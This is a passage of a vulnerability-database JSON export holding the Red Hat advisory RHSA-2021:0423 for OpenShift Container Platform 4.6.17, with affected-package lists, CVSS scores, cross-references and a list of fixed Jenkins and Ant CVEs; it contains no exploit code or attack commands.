{"OS": "RedHat", "OSVersion": "8", "arch": "x86_64", "packageVersion": "4.5.0-202102050524.p0.git.2594.ff3b8c0.el8", "packageFilename": "machine-config-daemon-4.5.0-202102050524.p0.git.2594.ff3b8c0.el8.x86_64.rpm", "operator": "lt", "packageName": "machine-config-daemon"}, {"OS": "RedHat", "OSVersion": "8", "arch": "ppc64le", "packageVersion": "4.5.0-202102050524.p0.git.0.9229406.el8", "packageFilename": "openshift-hyperkube-4.5.0-202102050524.p0.git.0.9229406.el8.ppc64le.rpm", "operator": "lt", "packageName": "openshift-hyperkube"}, {"OS": "RedHat", "OSVersion": "8", "arch": "s390x", "packageVersion": "4.5.0-202102050524.p0.git.0.9229406.el8", "packageFilename": "openshift-hyperkube-4.5.0-202102050524.p0.git.0.9229406.el8.s390x.rpm", "operator": "lt", "packageName": "openshift-hyperkube"}, {"OS": "RedHat", "OSVersion": "8", "arch": "src", "packageVersion": "4.5.0-202102050524.p0.git.0.9229406.el8", "packageFilename": "openshift-4.5.0-202102050524.p0.git.0.9229406.el8.src.rpm", "operator": "lt", "packageName": "openshift"}, {"OS": "RedHat", "OSVersion": "8", "arch": "x86_64", "packageVersion": "1.0.0-72.rhaos4.5.giteadfc6b.el8", "packageFilename": "runc-1.0.0-72.rhaos4.5.giteadfc6b.el8.x86_64.rpm", "operator": "lt", "packageName": "runc"}, {"OS": "RedHat", "OSVersion": "7", "arch": "noarch", "packageVersion": "4.5.0-202102031005.p0.git.0.c6839a2.el7", "packageFilename": "openshift-ansible-4.5.0-202102031005.p0.git.0.c6839a2.el7.noarch.rpm", "operator": "lt", "packageName": "openshift-ansible"}, {"OS": "RedHat", "OSVersion": "8", "arch": "ppc64le", "packageVersion": "1.0.0-72.rhaos4.5.giteadfc6b.el8", "packageFilename": "runc-debugsource-1.0.0-72.rhaos4.5.giteadfc6b.el8.ppc64le.rpm", "operator": "lt", "packageName": "runc-debugsource"}, {"OS": "RedHat", "OSVersion": "7", "arch": "src", "packageVersion": "4.5.0-202102051529.p0.git.3612.61b096a.el7", "packageFilename": "openshift-clients-4.5.0-202102051529.p0.git.3612.61b096a.el7.src.rpm", "operator": "lt", "packageName": "openshift-clients"}, {"OS": "RedHat", "OSVersion": "8", "arch": "s390x", "packageVersion": "2.0.21-1.rhaos4.5.el8", "packageFilename": "conmon-2.0.21-1.rhaos4.5.el8.s390x.rpm", "operator": "lt", "packageName": "conmon"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageVersion": "4.5.0-202102051529.p0.git.3612.61b096a.el7", "packageFilename": "openshift-clients-redistributable-4.5.0-202102051529.p0.git.3612.61b096a.el7.x86_64.rpm", "operator": "lt", "packageName": "openshift-clients-redistributable"}, {"OS": "RedHat", "OSVersion": "8", "arch": "x86_64", "packageVersion": "4.5.0-202102051529.p0.git.3612.61b096a.el8", "packageFilename": "openshift-clients-redistributable-4.5.0-202102051529.p0.git.3612.61b096a.el8.x86_64.rpm", "operator": "lt", "packageName": "openshift-clients-redistributable"}, {"OS": "RedHat", "OSVersion": "8", "arch": "src", "packageVersion": "4.5.0-202102051529.p0.git.3612.61b096a.el8", "packageFilename": "openshift-clients-4.5.0-202102051529.p0.git.3612.61b096a.el8.src.rpm", "operator": "lt", "packageName": "openshift-clients"}, {"OS": "RedHat", "OSVersion": "8", "arch": "x86_64", "packageVersion": "1.0.0-72.rhaos4.5.giteadfc6b.el8", "packageFilename": "runc-debugsource-1.0.0-72.rhaos4.5.giteadfc6b.el8.x86_64.rpm", "operator": "lt", "packageName": "runc-debugsource"}, {"OS": "RedHat", "OSVersion": "7", "arch": "noarch", "packageVersion": "4.5.0-202102031005.p0.git.0.c6839a2.el7", "packageFilename": "openshift-ansible-test-4.5.0-202102031005.p0.git.0.c6839a2.el7.noarch.rpm", "operator": "lt", "packageName": "openshift-ansible-test"}, {"OS": "RedHat", "OSVersion": "7", "arch": "src", "packageVersion": "4.5.0-202102031005.p0.git.0.c6839a2.el7", "packageFilename": "openshift-ansible-4.5.0-202102031005.p0.git.0.c6839a2.el7.src.rpm", "operator": "lt", "packageName": "openshift-ansible"}, {"OS": "RedHat", "OSVersion": "8", "arch": "ppc64le", "packageVersion": "1.0.0-72.rhaos4.5.giteadfc6b.el8", "packageFilename": "runc-debuginfo-1.0.0-72.rhaos4.5.giteadfc6b.el8.ppc64le.rpm", "operator": "lt", "packageName": "runc-debuginfo"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageVersion": "4.5.0-202102050524.p0.git.0.9229406.el7", "packageFilename": "openshift-hyperkube-4.5.0-202102050524.p0.git.0.9229406.el7.x86_64.rpm", "operator": "lt", "packageName": "openshift-hyperkube"}, {"OS": "RedHat", "OSVersion": "8", "arch": "s390x", "packageVersion": "1.0.0-72.rhaos4.5.giteadfc6b.el8", "packageFilename": "runc-1.0.0-72.rhaos4.5.giteadfc6b.el8.s390x.rpm", "operator": "lt", "packageName": "runc"}, {"OS": "RedHat", "OSVersion": "7", "arch": "s390x", "packageVersion": "2.0.21-1.rhaos4.5.el7", "packageFilename": "conmon-2.0.21-1.rhaos4.5.el7.s390x.rpm", "operator": "lt", "packageName": "conmon"}, {"OS": "RedHat", "OSVersion": "7", "arch": "s390x", "packageVersion": "4.5.0-202102051529.p0.git.3612.61b096a.el7", "packageFilename": "openshift-clients-4.5.0-202102051529.p0.git.3612.61b096a.el7.s390x.rpm", "operator": "lt", "packageName": "openshift-clients"}, {"OS": "RedHat", "OSVersion": "7", "arch": "noarch", "packageVersion": "2.263.3.1612434332-1.el7", "packageFilename": "jenkins-2.263.3.1612434332-1.el7.noarch.rpm", "operator": "lt", "packageName": "jenkins"}], "vendorCvss": {}}, "lastseen": "2021-07-28T14:35:14", "differentElements": ["vendorCvss"], "edition": 2}], "viewCount": 61, "enchantments": {"dependencies": {"references": [{"type": "nessus", "idList": ["REDHAT-RHSA-2021-0423.NASL", "FEDORA_2020-7F07DA3FEF.NASL", "FEDORA_2020-92B1D001B3.NASL", "EULEROS_SA-2020-1794.NASL", "PHOTONOS_PHSA-2020-3_0-0155_APACHE.NASL", "OPENSUSE-2020-1022.NASL", "ORACLE_ENTERPRISE_MANAGER_OPS_CENTER_JUL_2020_CPU.NASL", "PHOTONOS_PHSA-2020-3_0-0099_APACHE.NASL", "EULEROS_SA-2020-2327.NASL", "FREEBSD_PKG_6D5F1B0BB86548D5935B3FB6EBB425FC.NASL", "PHOTONOS_PHSA-2020-1_0-0335_APACHE.NASL", "JENKINS_2_276.NASL", "FEDORA_2020-52741B0A49.NASL", "REDHAT-RHSA-2021-0429.NASL", "GENTOO_GLSA-202007-34.NASL", "ORACLE_PRIMAVERA_GATEWAY_CPU_JUL_2020.NASL", "REDHAT-RHSA-2021-0637.NASL", "FEDORA_2020-3CE0F55BC5.NASL", "UBUNTU_USN-4380-1.NASL", "ORACLE_PRIMAVERA_UNIFIER_CPU_JUL_2020.NASL", "FEDORA_2020-2640AA4E19.NASL", "GENTOO_GLSA-202011-18.NASL", "EULEROS_SA-2020-2132.NASL", "ORACLE_PRIMAVERA_UNIFIER_CPU_JAN_2021.NASL", "ORACLE_BPM_CPU_OCT_2020.NASL", "PHOTONOS_PHSA-2020-1_0-0298_APACHE.NASL", "ORACLE_PRIMAVERA_GATEWAY_CPU_JAN_2021.NASL", "EULEROS_SA-2020-1915.NASL", "JENKINS_2_274.NASL", "EULEROS_SA-2021-1133.NASL", "PHOTONOS_PHSA-2020-2_0-0291_APACHE.NASL"]}, {"type": "redhat", "idList": ["RHSA-2021:0423", "RHSA-2020:2618", "RHSA-2021:0719", "RHSA-2020:4961", "RHSA-2020:4960", "RHSA-2021:0637"]}, {"type": "archlinux", "idList": ["ASA-202005-15", "ASA-202012-5", "ASA-202101-41"]}, {"type": "redhatcve", "idList": ["RH:CVE-2021-21608", "RH:CVE-2021-21604", "RH:CVE-2021-21615", "RH:CVE-2020-11979", "RH:CVE-2021-21607", "RH:CVE-2021-21610", "RH:CVE-2020-1945", "RH:CVE-2021-21605", "RH:CVE-2021-21603", "RH:CVE-2021-21611", "RH:CVE-2021-21609", "RH:CVE-2021-21602", "RH:CVE-2021-21606"]}, {"type": "cve", "idList": ["CVE-2021-21611", "CVE-2021-21615", "CVE-2021-21603", "CVE-2021-21605", "CVE-2021-21602", "CVE-2021-21604", "CVE-2020-11979", "CVE-2020-1945", "CVE-2021-21610", "CVE-2021-21608", "CVE-2021-21606", "CVE-2021-21609", "CVE-2021-21607"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2020-1945", "UB:CVE-2020-11979"]}, {"type": "github", "idList": ["GHSA-F62V-XPXF-3V68", "GHSA-4P6W-M9WC-C9C9"]}, {"type": "gentoo", "idList": ["GLSA-202007-34", "GLSA-202011-18"]}, {"type": "fedora", "idList": ["FEDORA:2D51F60C28B2", "FEDORA:146FE30DD5E7", "FEDORA:6869030D3139", "FEDORA:52396606732B", "FEDORA:88EAA30905CF"]}, {"type": "photon", "idList": ["PHSA-2021-4.0-0036", "PHSA-2020-3.0-0155", "PHSA-2020-1.0-0335", "PHSA-2020-1.0-0298", "PHSA-2020-2.0-0247", "PHSA-2020-2.0-0291", "PHSA-2020-3.0-0099"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310877939", "OPENVAS:1361412562310844454", "OPENVAS:1361412562310877930"]}, {"type": "freebsd", "idList": ["6D5F1B0B-B865-48D5-935B-3FB6EBB425FC"]}, {"type": "ubuntu", "idList": ["USN-4380-1"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:1022-1"]}, {"type": "oracle", "idList": ["ORACLE:CPUJUL2020", "ORACLE:CPUOCT2020", "ORACLE:CPUJUL2021", "ORACLE:CPUAPR2021", "ORACLE:CPUJAN2021"]}], "modified": "2021-08-25T20:37:21", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-08-25T20:37:21", "rev": 2}}, "objectVersion": "1.6", "affectedPackage": [{"OS": "RedHat", "OSVersion": "7", "arch": "ppc64le", "packageVersion": "4.5.0-202102050524.p0.git.0.9229406.el7", "packageFilename": "openshift-hyperkube-4.5.0-202102050524.p0.git.0.9229406.el7.ppc64le.rpm", "operator": "lt", "packageName": "openshift-hyperkube"}, {"OS": "RedHat", "OSVersion": "8", "arch": "ppc64le", "packageVersion": "2.0.21-1.rhaos4.5.el8", "packageFilename": "conmon-2.0.21-1.rhaos4.5.el8.ppc64le.rpm", "operator": "lt", "packageName": "conmon"}, {"OS": "RedHat", "OSVersion": "7", "arch": "s390x", "packageVersion": "4.5.0-202102051529.p0.git.3612.61b096a.el7", "packageFilename": "openshift-clients-4.5.0-202102051529.p0.git.3612.61b096a.el7.s390x.rpm", "operator": "lt", "packageName": "openshift-clients"}, {"OS": "RedHat", "OSVersion": "8", "arch": "s390x", "packageVersion": "1.0.0-72.rhaos4.5.giteadfc6b.el8", "packageFilename": "runc-debugsource-1.0.0-72.rhaos4.5.giteadfc6b.el8.s390x.rpm", "operator": "lt", "packageName": "runc-debugsource"}, {"OS": "RedHat", "OSVersion": "8", "arch": "ppc64le", "packageVersion": "1.0.0-72.rhaos4.5.giteadfc6b.el8", "packageFilename": "runc-debugsource-1.0.0-72.rhaos4.5.giteadfc6b.el8.ppc64le.rpm", "operator": "lt", "packageName": "runc-debugsource"}, {"OS": "RedHat", "OSVersion": "7", "arch": "src", "packageVersion": "2.0.21-1.rhaos4.5.el7", "packageFilename": "conmon-2.0.21-1.rhaos4.5.el7.src.rpm", "operator": "lt", "packageName": "conmon"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageVersion": "4.5.0-202102050524.p0.git.0.9229406.el7", "packageFilename": "openshift-hyperkube-4.5.0-202102050524.p0.git.0.9229406.el7.x86_64.rpm", "operator": "lt", "packageName": "openshift-hyperkube"}, {"OS": "RedHat", "OSVersion": "7", "arch": "src", "packageVersion": "4.5.0-202102031005.p0.git.0.c6839a2.el7", "packageFilename": "openshift-ansible-4.5.0-202102031005.p0.git.0.c6839a2.el7.src.rpm", "operator": "lt", "packageName": "openshift-ansible"}, {"OS": "RedHat", "OSVersion": "8", "arch": "x86_64", "packageVersion": "2.0.21-1.rhaos4.5.el8", "packageFilename": "conmon-2.0.21-1.rhaos4.5.el8.x86_64.rpm", "operator": "lt", "packageName": "conmon"}, {"OS": "RedHat", "OSVersion": "7", "arch": "s390x", "packageVersion": "4.5.0-202102050524.p0.git.0.9229406.el7", "packageFilename": "openshift-hyperkube-4.5.0-202102050524.p0.git.0.9229406.el7.s390x.rpm", "operator": "lt", "packageName": "openshift-hyperkube"}, {"OS": "RedHat", "OSVersion": "8", "arch": "src", "packageVersion": "4.5.0-202102050524.p0.git.2594.ff3b8c0.el8", "packageFilename": "machine-config-daemon-4.5.0-202102050524.p0.git.2594.ff3b8c0.el8.src.rpm", "operator": "lt", "packageName": "machine-config-daemon"}, {"OS": "RedHat", "OSVersion": "8", "arch": "ppc64le", "packageVersion": "4.5.0-202102051529.p0.git.3612.61b096a.el8", "packageFilename": "openshift-clients-4.5.0-202102051529.p0.git.3612.61b096a.el8.ppc64le.rpm", "operator": "lt", "packageName": "openshift-clients"}, {"OS": "RedHat", "OSVersion": "8", "arch": "src", "packageVersion": "4.5.0-202102051529.p0.git.3612.61b096a.el8", "packageFilename": "openshift-clients-4.5.0-202102051529.p0.git.3612.61b096a.el8.src.rpm", "operator": "lt", "packageName": "openshift-clients"}, {"OS": "RedHat", "OSVersion": "8", "arch": "src", "packageVersion": "1.0.0-72.rhaos4.5.giteadfc6b.el8", "packageFilename": "runc-1.0.0-72.rhaos4.5.giteadfc6b.el8.src.rpm", "operator": "lt", "packageName": "runc"}, {"OS": "RedHat", "OSVersion": "8", "arch": "s390x", "packageVersion": "4.5.0-202102051529.p0.git.3612.61b096a.el8", "packageFilename": "openshift-clients-4.5.0-202102051529.p0.git.3612.61b096a.el8.s390x.rpm", "operator": "lt", "packageName": "openshift-clients"}, {"OS": "RedHat", "OSVersion": "8", "arch": "src", "packageVersion": "4.5.0-202102050524.p0.git.0.9229406.el8", "packageFilename": "openshift-4.5.0-202102050524.p0.git.0.9229406.el8.src.rpm", "operator": "lt", "packageName": "openshift"}, {"OS": "RedHat", "OSVersion": "7", "arch": "src", "packageVersion": "2.263.3.1612434332-1.el7", "packageFilename": "jenkins-2.263.3.1612434332-1.el7.src.rpm", "operator": "lt", "packageName": "jenkins"}, {"OS": "RedHat", "OSVersion": "7", "arch": "ppc64le", "packageVersion": "2.0.21-1.rhaos4.5.el7", "packageFilename": "conmon-2.0.21-1.rhaos4.5.el7.ppc64le.rpm", "operator": "lt", "packageName": "conmon"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageVersion": "2.0.21-1.rhaos4.5.el7", "packageFilename": "conmon-2.0.21-1.rhaos4.5.el7.x86_64.rpm", "operator": "lt", "packageName": "conmon"}, {"OS": "RedHat", "OSVersion": "7", "arch": "src", "packageVersion": "4.5.0-202102051529.p0.git.3612.61b096a.el7", "packageFilename": "openshift-clients-4.5.0-202102051529.p0.git.3612.61b096a.el7.src.rpm", "operator": "lt", "packageName": "openshift-clients"}, {"OS": "RedHat", "OSVersion": "8", "arch": "x86_64", "packageVersion": "1.0.0-72.rhaos4.5.giteadfc6b.el8", "packageFilename": "runc-1.0.0-72.rhaos4.5.giteadfc6b.el8.x86_64.rpm", "operator": "lt", "packageName": "runc"}, {"OS": "RedHat", "OSVersion": "8", "arch": "x86_64", "packageVersion": "1.0.0-72.rhaos4.5.giteadfc6b.el8", "packageFilename": "runc-debugsource-1.0.0-72.rhaos4.5.giteadfc6b.el8.x86_64.rpm", "operator": "lt", "packageName": "runc-debugsource"}, {"OS": "RedHat", "OSVersion": "7", "arch": "noarch", "packageVersion": "4.5.0-202102031005.p0.git.0.c6839a2.el7", "packageFilename": "openshift-ansible-4.5.0-202102031005.p0.git.0.c6839a2.el7.noarch.rpm", "operator": "lt", "packageName": "openshift-ansible"}, {"OS": "RedHat", "OSVersion": "7", "arch": "src", "packageVersion": "4.5.0-202102050524.p0.git.0.9229406.el7", "packageFilename": "openshift-4.5.0-202102050524.p0.git.0.9229406.el7.src.rpm", "operator": "lt", "packageName": "openshift"}, {"OS": "RedHat", "OSVersion": "8", "arch": "s390x", "packageVersion": "1.0.0-72.rhaos4.5.giteadfc6b.el8", "packageFilename": "runc-debuginfo-1.0.0-72.rhaos4.5.giteadfc6b.el8.s390x.rpm", "operator": "lt", "packageName": "runc-debuginfo"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageVersion": "4.5.0-202102051529.p0.git.3612.61b096a.el7", "packageFilename": "openshift-clients-redistributable-4.5.0-202102051529.p0.git.3612.61b096a.el7.x86_64.rpm", "operator": "lt", "packageName": "openshift-clients-redistributable"}, {"OS": "RedHat", "OSVersion": "7", "arch": "s390x", "packageVersion": "2.0.21-1.rhaos4.5.el7", "packageFilename": "conmon-2.0.21-1.rhaos4.5.el7.s390x.rpm", "operator": "lt", "packageName": "conmon"}, {"OS": "RedHat", "OSVersion": "7", "arch": "noarch", "packageVersion": "2.263.3.1612434332-1.el7", "packageFilename": "jenkins-2.263.3.1612434332-1.el7.noarch.rpm", "operator": "lt", "packageName": "jenkins"}, {"OS": "RedHat", "OSVersion": "8", "arch": "ppc64le", "packageVersion": "4.5.0-202102050524.p0.git.2594.ff3b8c0.el8", "packageFilename": "machine-config-daemon-4.5.0-202102050524.p0.git.2594.ff3b8c0.el8.ppc64le.rpm", "operator": "lt", "packageName": "machine-config-daemon"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageVersion": "4.5.0-202102051529.p0.git.3612.61b096a.el7", "packageFilename": "openshift-clients-4.5.0-202102051529.p0.git.3612.61b096a.el7.x86_64.rpm", "operator": "lt", "packageName": "openshift-clients"}, {"OS": "RedHat", "OSVersion": "8", "arch": "ppc64le", "packageVersion": "1.0.0-72.rhaos4.5.giteadfc6b.el8", "packageFilename": "runc-debuginfo-1.0.0-72.rhaos4.5.giteadfc6b.el8.ppc64le.rpm", "operator": "lt", "packageName": "runc-debuginfo"}, {"OS": "RedHat", "OSVersion": "8", "arch": "ppc64le", "packageVersion": "4.5.0-202102050524.p0.git.0.9229406.el8", "packageFilename": "openshift-hyperkube-4.5.0-202102050524.p0.git.0.9229406.el8.ppc64le.rpm", "operator": "lt", "packageName": "openshift-hyperkube"}, {"OS": "RedHat", "OSVersion": "8", "arch": "ppc64le", "packageVersion": "1.0.0-72.rhaos4.5.giteadfc6b.el8", "packageFilename": "runc-1.0.0-72.rhaos4.5.giteadfc6b.el8.ppc64le.rpm", "operator": "lt", "packageName": "runc"}, {"OS": "RedHat", "OSVersion": "8", "arch": "x86_64", "packageVersion": "4.5.0-202102051529.p0.git.3612.61b096a.el8", "packageFilename": "openshift-clients-4.5.0-202102051529.p0.git.3612.61b096a.el8.x86_64.rpm", "operator": "lt", "packageName": "openshift-clients"}, {"OS": "RedHat", "OSVersion": "8", "arch": "x86_64", "packageVersion": "4.5.0-202102050524.p0.git.0.9229406.el8", "packageFilename": "openshift-hyperkube-4.5.0-202102050524.p0.git.0.9229406.el8.x86_64.rpm", "operator": "lt", "packageName": "openshift-hyperkube"}, {"OS": "RedHat", "OSVersion": "8", "arch": "s390x", "packageVersion": "1.0.0-72.rhaos4.5.giteadfc6b.el8", "packageFilename": "runc-1.0.0-72.rhaos4.5.giteadfc6b.el8.s390x.rpm", "operator": "lt", "packageName": "runc"}, {"OS": "RedHat", "OSVersion": "8", "arch": "s390x", "packageVersion": "2.0.21-1.rhaos4.5.el8", "packageFilename": "conmon-2.0.21-1.rhaos4.5.el8.s390x.rpm", "operator": "lt", "packageName": "conmon"}, {"OS": "RedHat", "OSVersion": "7", "arch": "ppc64le", "packageVersion": "4.5.0-202102051529.p0.git.3612.61b096a.el7", "packageFilename": "openshift-clients-4.5.0-202102051529.p0.git.3612.61b096a.el7.ppc64le.rpm", "operator": "lt", "packageName": "openshift-clients"}, {"OS": "RedHat", "OSVersion": "8", "arch": "s390x", "packageVersion": "4.5.0-202102050524.p0.git.2594.ff3b8c0.el8", "packageFilename": "machine-config-daemon-4.5.0-202102050524.p0.git.2594.ff3b8c0.el8.s390x.rpm", "operator": "lt", "packageName": "machine-config-daemon"}, {"OS": "RedHat", "OSVersion": "7", "arch": "noarch", "packageVersion": "4.5.0-202102031005.p0.git.0.c6839a2.el7", "packageFilename": "openshift-ansible-test-4.5.0-202102031005.p0.git.0.c6839a2.el7.noarch.rpm", "operator": "lt", "packageName": "openshift-ansible-test"}, {"OS": "RedHat", "OSVersion": "8", "arch": "x86_64", "packageVersion": "4.5.0-202102051529.p0.git.3612.61b096a.el8", "packageFilename": "openshift-clients-redistributable-4.5.0-202102051529.p0.git.3612.61b096a.el8.x86_64.rpm", "operator": "lt", "packageName": "openshift-clients-redistributable"}, {"OS": "RedHat", "OSVersion": "8", "arch": "x86_64", "packageVersion": "1.0.0-72.rhaos4.5.giteadfc6b.el8", "packageFilename": "runc-debuginfo-1.0.0-72.rhaos4.5.giteadfc6b.el8.x86_64.rpm", "operator": "lt", "packageName": "runc-debuginfo"}, {"OS": "RedHat", "OSVersion": "8", "arch": "x86_64", "packageVersion": "4.5.0-202102050524.p0.git.2594.ff3b8c0.el8", "packageFilename": "machine-config-daemon-4.5.0-202102050524.p0.git.2594.ff3b8c0.el8.x86_64.rpm", "operator": "lt", "packageName": "machine-config-daemon"}, {"OS": "RedHat", "OSVersion": "8", "arch": "src", "packageVersion": "2.0.21-1.rhaos4.5.el8", "packageFilename": "conmon-2.0.21-1.rhaos4.5.el8.src.rpm", "operator": "lt", "packageName": "conmon"}, {"OS": "RedHat", "OSVersion": "8", "arch": "s390x", "packageVersion": "4.5.0-202102050524.p0.git.0.9229406.el8", "packageFilename": "openshift-hyperkube-4.5.0-202102050524.p0.git.0.9229406.el8.s390x.rpm", "operator": "lt", "packageName": "openshift-hyperkube"}], "vendorCvss": {"severity": "important"}, "_object_type": "robots.models.redhat.RedHatBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.redhat.RedHatBulletin"]}, {"id": "RHSA-2021:0423", "hash": "8b7b7d8b007e62750d0579111923b98c", "type": "redhat", "bulletinFamily": "unix", "title": "(RHSA-2021:0423) Important: OpenShift Container Platform 4.6.17 security and packages update", "description": "Red Hat OpenShift Container Platform is Red Hat's cloud computing\nKubernetes application platform solution designed for on-premise or private\ncloud deployments.\n\nThis advisory contains the RPM packages for Red Hat OpenShift Container\nPlatform 4.6.17. See the following advisory for the container images for\nthis release:\n\nhttps://access.redhat.com/errata/RHBA-2021:0424\n\nSecurity Fix(es):\n\n* jenkins: XSS vulnerability in notification bar (CVE-2021-21603)\n\n* jenkins: Improper handling of REST API XML deserialization errors (CVE-2021-21604)\n\n* jenkins: Path traversal vulnerability in agent names (CVE-2021-21605)\n\n* jenkins: Stored XSS vulnerability in button labels (CVE-2021-21608)\n\n* jenkins: Reflected XSS vulnerability in markup formatter preview (CVE-2021-21610)\n\n* jenkins: Stored XSS vulnerability on new item page (CVE-2021-21611)\n\n* ant: insecure temporary file vulnerability (CVE-2020-1945)\n\n* ant: insecure temporary file (CVE-2020-11979)\n\n* jenkins: Arbitrary file read vulnerability in workspace browsers (CVE-2021-21602)\n\n* jenkins: Arbitrary file existence check in file fingerprints (CVE-2021-21606)\n\n* jenkins: Excessive memory allocation in graph URLs leads to denial of service (CVE-2021-21607)\n\n* jenkins: Filesystem traversal by privileged users (CVE-2021-21615)\n\n* jenkins: Missing permission check for paths with specific prefix (CVE-2021-21609)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "published": "2021-02-17T23:52:18", "modified": "2021-02-17T23:58:25", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 6.8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.0, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 2.1, "impactScore": 5.9}, "href": "https://access.redhat.com/errata/RHSA-2021:0423", "reporter": "RedHat", "references": [], "cvelist": ["CVE-2020-11979", "CVE-2020-1945", "CVE-2021-21602", "CVE-2021-21603", "CVE-2021-21604", "CVE-2021-21605", "CVE-2021-21606", "CVE-2021-21607", "CVE-2021-21608", "CVE-2021-21609", "CVE-2021-21610", "CVE-2021-21611", "CVE-2021-21615"], "immutableFields": [], "lastseen": "2021-08-25T20:35:08", "history": [{"bulletin": {"id": "RHSA-2021:0423", "hash": "40cfe542e4675fdf0be9b9f3363c2137", "type": "redhat", "bulletinFamily": "unix", "title": "(RHSA-2021:0423) Important: OpenShift Container Platform 4.6.17 security and packages update", "description": "Red Hat OpenShift Container Platform is Red Hat's cloud computing\nKubernetes application platform solution designed for on-premise or private\ncloud deployments.\n\nThis advisory contains the RPM packages for Red Hat OpenShift Container\nPlatform 4.6.17. See the following advisory for the container images for\nthis release:\n\nhttps://access.redhat.com/errata/RHBA-2021:0424\n\nSecurity Fix(es):\n\n* jenkins: XSS vulnerability in notification bar (CVE-2021-21603)\n\n* jenkins: Improper handling of REST API XML deserialization errors (CVE-2021-21604)\n\n* jenkins: Path traversal vulnerability in agent names (CVE-2021-21605)\n\n* jenkins: Stored XSS vulnerability in button labels (CVE-2021-21608)\n\n* jenkins: Reflected XSS vulnerability in markup formatter preview (CVE-2021-21610)\n\n* jenkins: Stored XSS vulnerability on new item page (CVE-2021-21611)\n\n* ant: insecure temporary file vulnerability (CVE-2020-1945)\n\n* ant: insecure temporary file (CVE-2020-11979)\n\n* jenkins: Arbitrary file read vulnerability in workspace browsers (CVE-2021-21602)\n\n* jenkins: Arbitrary file existence check in file fingerprints (CVE-2021-21606)\n\n* jenkins: Excessive memory allocation in graph URLs leads to denial of service (CVE-2021-21607)\n\n* jenkins: Filesystem traversal by privileged users (CVE-2021-21615)\n\n* jenkins: Missing permission check for paths with specific prefix (CVE-2021-21609)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "published": "2021-02-17T23:52:18", "modified": "2021-02-17T23:58:25", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {}, "href": "https://access.redhat.com/errata/RHSA-2021:0423", "reporter": "RedHat", "references": [], "cvelist": ["CVE-2020-11979", "CVE-2020-1945", "CVE-2021-21602", "CVE-2021-21603", "CVE-2021-21604", "CVE-2021-21605", "CVE-2021-21606", "CVE-2021-21607", "CVE-2021-21608", "CVE-2021-21609", "CVE-2021-21610", "CVE-2021-21611", "CVE-2021-21615"], "immutableFields": [], "lastseen": "2021-02-17T20:31:14", "history": [], "viewCount": 56, "enchantments": {"dependencies": {"references": [{"type": "nessus", "idList": ["FREEBSD_PKG_D6F76976E86D4F9A936276C849B10DB2.NASL", "FREEBSD_PKG_425F214388764B0AAF84E0238C5C2062.NASL", "PHOTONOS_PHSA-2020-1_0-0335_APACHE.NASL", "JENKINS_2_276.NASL", "REDHAT-RHSA-2021-0423.NASL", "JENKINS_2_274.NASL", "REDHAT-RHSA-2021-0429.NASL", "EULEROS_SA-2021-1133.NASL", "PHOTONOS_PHSA-2020-3_0-0155_APACHE.NASL", "FEDORA_2020-2640AA4E19.NASL"]}, {"type": "redhat", "idList": ["RHSA-2021:0637", "RHSA-2021:0719", "RHSA-2020:4961", "RHSA-2020:2618", "RHSA-2020:4960", "RHSA-2021:0429"]}, {"type": "archlinux", "idList": ["ASA-202012-5", "ASA-202101-41", "ASA-202005-15"]}, {"type": "redhatcve", "idList": ["RH:CVE-2021-21608", "RH:CVE-2020-11979", "RH:CVE-2021-21611", "RH:CVE-2021-21615", "RH:CVE-2021-21610", "RH:CVE-2021-21607", "RH:CVE-2021-21603", "RH:CVE-2021-21606", "RH:CVE-2021-21602", "RH:CVE-2021-21609"]}, {"type": "cve", "idList": ["CVE-2021-21602", "CVE-2021-21606", "CVE-2021-21609", "CVE-2021-21610", "CVE-2021-21603", "CVE-2021-21615", "CVE-2021-21608", "CVE-2021-21611", "CVE-2021-21607", "CVE-2021-21605"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2020-11979", "UB:CVE-2020-1945"]}, {"type": "fedora", "idList": ["FEDORA:146FE30DD5E7", "FEDORA:2D51F60C28B2", "FEDORA:88EAA30905CF", "FEDORA:52396606732B", "FEDORA:6869030D3139"]}, {"type": "gentoo", "idList": ["GLSA-202011-18", "GLSA-202007-34"]}, {"type": "github", "idList": ["GHSA-4P6W-M9WC-C9C9", "GHSA-F62V-XPXF-3V68"]}, {"type": "ubuntu", "idList": ["USN-4380-1"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310877939", "OPENVAS:1361412562310877930", "OPENVAS:1361412562310844454"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:1022-1"]}, 